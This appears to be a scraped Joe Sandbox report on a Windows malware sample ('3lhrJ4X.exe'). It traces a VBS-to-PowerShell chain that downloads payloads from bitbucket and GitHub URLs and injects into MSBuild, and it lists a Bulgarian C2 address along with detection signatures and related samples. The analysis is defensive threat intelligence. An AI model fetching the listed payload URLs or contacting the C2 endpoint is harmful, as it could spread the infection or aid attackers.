                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Rundll32
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583964 Sample: 3lhrJ4X.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 79 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->79 81 s3-w.us-east-1.amazonaws.com 2->81 83 8 other IPs or domains 2->83 97 Suricata IDS alerts for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Sigma detected: Powershell download payload from hardcoded c2 list 2->101 103 12 other signatures 2->103 13 3lhrJ4X.exe 1 3 2->13         started        16 MSBuild.exe 2->16         started        18 MSBuild.exe 2->18         started        20 rundll32.exe 2->20         started        signatures3 process4 file5 77 C:\Users\user\AppData\...\67784c48226c6.vbs, ASCII 13->77 dropped 22 cmd.exe 3 2 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        process6 process7 28 wscript.exe 1 22->28         started        31 conhost.exe 22->31         started        signatures8 113 Suspicious powershell command line found 28->113 115 Wscript starts Powershell (via cmd or directly) 28->115 117 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->117 119 Suspicious execution chain found 28->119 33 powershell.exe 7 28->33         started        process9 signatures10 93 Suspicious powershell command line found 33->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 33->95 36 powershell.exe 14 24 33->36         started        40 conhost.exe 33->40         started        process11 dnsIp12 85 raw.githubusercontent.com 185.199.111.133, 443, 49731 FASTLYUS Netherlands 36->85 87 bitbucket.org 185.166.143.48, 443, 49730, 49732 AMAZON-02US Germany 36->87 89 s3-w.us-east-1.amazonaws.com 52.216.138.83, 443, 49733 AMAZON-02US United States 36->89 105 Found strings related to Crypto-Mining 36->105 107 Writes to foreign memory regions 36->107 109 Injects a PE file into a foreign processes 36->109 111 Loading BitLocker PowerShell Module 36->111 42 MSBuild.exe 15 505 36->42         started        signatures13 process14 dnsIp15 91 87.120.126.5, 49822, 49863, 49917 UNACS-AS-BG8000BurgasBG Bulgaria 42->91 69 C:\Users\user\...\windowspowershell.exe, PE32 42->69 dropped 71 C:\Users\user\OneDrive\windows sidebar.exe, PE32 42->71 dropped 73 C:\Users\...\windows portable devices.exe, PE32 42->73 dropped 75 21 other files (none is malicious) 42->75 dropped 121 Protects its processes via BreakOnTermination flag 42->121 123 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 42->123 125 Uses cmd line tools excessively to alter registry or file data 42->125 127 2 other signatures 42->127 47 schtasks.exe 42->47         started        49 schtasks.exe 42->49         started        51 attrib.exe 42->51         started        53 12 other processes 42->53 file16 signatures17 process18 process19 55 conhost.exe 47->55         started        57 conhost.exe 49->57         started        59 conhost.exe 51->59         started        61 conhost.exe 53->61         started        63 conhost.exe 53->63         started        65 conhost.exe 53->65         started        67 9 other processes 53->67

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  3lhrJ4X.exe8%ReversingLabs
                  SourceDetectionScannerLabelLink
                  C:\Users\user\OneDrive\autoit3.exe0%ReversingLabs
                  C:\Users\user\OneDrive\common files.exe0%ReversingLabs
                  C:\Users\user\OneDrive\google.exe0%ReversingLabs
                  C:\Users\user\OneDrive\ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe0%ReversingLabs
                  C:\Users\user\OneDrive\internet explorer.exe0%ReversingLabs
                  C:\Users\user\OneDrive\java.exe0%ReversingLabs
                  C:\Users\user\OneDrive\jdownloader.exe0%ReversingLabs
                  C:\Users\user\OneDrive\microsoft office.exe0%ReversingLabs
                  C:\Users\user\OneDrive\microsoft onedrive.exe0%ReversingLabs
                  C:\Users\user\OneDrive\microsoft.exe0%ReversingLabs
                  C:\Users\user\OneDrive\microsoft.net.exe0%ReversingLabs
                  C:\Users\user\OneDrive\mozilla maintenance service.exe0%ReversingLabs
                  C:\Users\user\OneDrive\msbuild.exe0%ReversingLabs
                  C:\Users\user\OneDrive\msecache.exe0%ReversingLabs
                  C:\Users\user\OneDrive\reference assemblies.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows defender.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows mail.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows media player.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows multimedia platform.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows nt.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows photo viewer.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows portable devices.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windows sidebar.exe0%ReversingLabs
                  C:\Users\user\OneDrive\windowspowershell.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://87.120.126.5/VmCetSC7/page.php0%Avira URL Cloudsafe
                  http://87.120.126.5/VmCetSC7/page.phpP0%Avira URL Cloudsafe
                  http://87.120.126.50%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s3-w.us-east-1.amazonaws.com
                  52.216.138.83
                  truefalse
                    high
                    bitbucket.org
                    185.166.143.48
                    truefalse
                      high
                      bg.microsoft.map.fastly.net
                      199.232.214.172
                      truefalse
                        high
                        raw.githubusercontent.com
                        185.199.111.133
                        truefalse
                          high
                          s-part-0017.t-0009.t-msedge.net
                          13.107.246.45
                          truefalse
                            high
                            fp2e7a.wpc.phicdn.net
                            192.229.221.95
                            truefalse
                              high
                              bbuseruploads.s3.amazonaws.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://bitbucket.org/fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txtfalse
                                  high
                                  https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpgfalse
                                    high
                                    https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612false
                                      high
                                      http://87.120.126.5/VmCetSC7/page.phptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBCFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://bitbucket.orgpowershell.exe, 00000006.00000002.1823716932.000001D3BB7DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000006.00000002.1823716932.000001D3BBFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBFE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://87.120.126.5/VmCetSC7/page.phpPMSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://bbuseruploads.s3.amazonaws.com/d0a43d21-72a8-4789-9e4a-6c02f03bb585/downloads/196619b4-f993-powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://raw.githubusercontent.compowershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.cookielaw.org/powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://87.120.126.5MSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://aui-cdn.atlassian.com/powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bbuseruploads.s3.amazonaws.com/e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.2060947701.000002084DA7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2060947701.000002084DAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://s3-w.us-east-1.amazonaws.compowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2060947701.000002084DAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://bitbucket.orgpowershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://bbuseruploads.s3.amazonaws.compowershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                185.166.143.48
                                                                                                bitbucket.orgGermany
                                                                                                16509AMAZON-02USfalse
                                                                                                87.120.126.5
                                                                                                unknownBulgaria
                                                                                                25206UNACS-AS-BG8000BurgasBGtrue
                                                                                                52.216.138.83
                                                                                                s3-w.us-east-1.amazonaws.comUnited States
                                                                                                16509AMAZON-02USfalse
                                                                                                185.199.111.133
                                                                                                raw.githubusercontent.comNetherlands
                                                                                                54113FASTLYUSfalse
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1583964
                                                                                                Start date and time:2025-01-03 23:19:05 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 3s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:47
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:3lhrJ4X.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.spre.troj.expl.evad.mine.winEXE@64/37@3/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 40%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 179
                                                                                                • Number of non-executed functions: 29
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 199.232.214.172, 192.229.221.95, 40.69.42.241, 20.242.39.171, 13.107.246.45
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                • Execution Graph export aborted for target MSBuild.exe, PID 5440 because it is empty
                                                                                                • Execution Graph export aborted for target MSBuild.exe, PID 7696 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: 3lhrJ4X.exe
                                                                                                TimeTypeDescription
                                                                                                17:19:57API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                17:20:11API Interceptor9997846x Sleep call for process: MSBuild.exe modified
                                                                                                22:20:57Task SchedulerRun new task: Msbuild path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                                                22:20:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnk
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                87.120.126.53u8A2xjbBT.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                • 87.120.126.5/VmCetSC7/page.php
                                                                                                185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                raw.githubusercontent.comdGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.199.109.133
                                                                                                ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                over.ps1Get hashmaliciousVidarBrowse
                                                                                                • 185.199.109.133
                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.199.110.133
                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                • 185.199.108.133
                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                • 185.199.108.133
                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                bitbucket.org1111.htaGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.50
                                                                                                Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                • 185.166.143.49
                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.48
                                                                                                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.50
                                                                                                fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                • 185.166.143.49
                                                                                                Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.48
                                                                                                2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.50
                                                                                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                s3-w.us-east-1.amazonaws.comFaxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                • 52.217.199.81
                                                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                • 16.182.32.57
                                                                                                PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                • 16.182.35.201
                                                                                                https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                                • 54.231.199.241
                                                                                                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                • 52.216.216.113
                                                                                                fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.182.108.137
                                                                                                SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.182.108.137
                                                                                                Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                • 3.5.8.193
                                                                                                2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                • 52.217.14.36
                                                                                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.15.177.52
                                                                                                bg.microsoft.map.fastly.net2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                                                                • 199.232.210.172
                                                                                                Reparto Trabajo TP4.xlsmGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                file.exeGet hashmaliciousDcRat, JasonRATBrowse
                                                                                                • 199.232.214.172
                                                                                                iviewers.dllGet hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.214.172
                                                                                                wrcaf.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                iubn.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                rwvg1.exeGet hashmaliciousDcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                ersyb.exeGet hashmaliciousDcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                • 199.232.214.172
                                                                                                Hornswoggle.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 199.232.214.172
                                                                                                8n26gvrXUM.exeGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                FASTLYUShttps://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                                • 199.232.196.193
                                                                                                https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.130.137
                                                                                                nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                • 151.101.194.137
                                                                                                https://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.2.137
                                                                                                http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.2.133
